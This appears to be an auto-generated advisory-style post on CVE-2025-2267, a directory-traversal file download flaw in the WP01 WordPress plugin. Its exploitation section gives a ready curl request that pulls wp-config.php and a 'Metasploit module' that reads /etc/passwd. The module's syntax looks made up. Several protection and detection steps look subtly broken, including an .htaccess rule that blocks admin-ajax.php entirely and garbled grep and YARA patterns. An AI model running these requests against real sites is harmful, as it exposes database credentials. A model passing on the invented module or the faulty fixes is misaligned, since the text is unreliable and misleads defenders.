Listen to this Post
How CVE-2025-2267 Works
The WP01 plugin’s `make_archive()` function lacks proper capability checks and file path validation. Authenticated attackers with Subscriber-level permissions can manipulate the `file` parameter to download arbitrary server files (e.g., /etc/passwd, wp-config.php). The plugin fails to restrict directory traversal, allowing access via crafted requests like wp-admin/admin-ajax.php?action=wp01_download&file=../../../wp-config.php. This exposes sensitive data, including database credentials and system files.
DailyCVE Form
Platform: WordPress
Version: ≤ 2.6.2
Vulnerability: Arbitrary File Download
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Craft Malicious Request:
curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=wp01_download&file=../../../wp-config.php" --cookie "wordpress_logged_in_[bash]=[bash]"
2. Metasploit Module:
module.exploit('wp01_file_download') do |request|
request.target_uri.path = '/wp-admin/admin-ajax.php'
request.add_param('action', 'wp01_download')
request.add_param('file', '../../../../etc/passwd')
end
Protection
1. Immediate Mitigation:
chmod -R 750 /var/www/html/wp-content/plugins/wp01/
2. .htaccess Restriction:
<Files "admin-ajax.php"> Require all denied ErrorDocument 403 "Access Forbidden" </Files>
3. WAF Rule (ModSecurity):
SecRule ARGS:file "@contains ../" "id:1005,deny,msg:'Directory Traversal Attempt'"
Detection
1. Log Analysis:
grep "wp01_download..." /var/log/apache2/access.log
2. YARA Rule:
rule wp01_exploit {
strings: $s = /wp01_download.file=...\//
condition: $s
}
Patch Analysis
Diff for `wp01/includes/core.php`:
- function make_archive($file) {
+ function make_archive($file) {
+ if (!current_user_can('manage_options') || strpos($file, '..') !== false) {
+ wp_die('Access denied');
+ }
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2267
Extra Source Hub:
Undercode
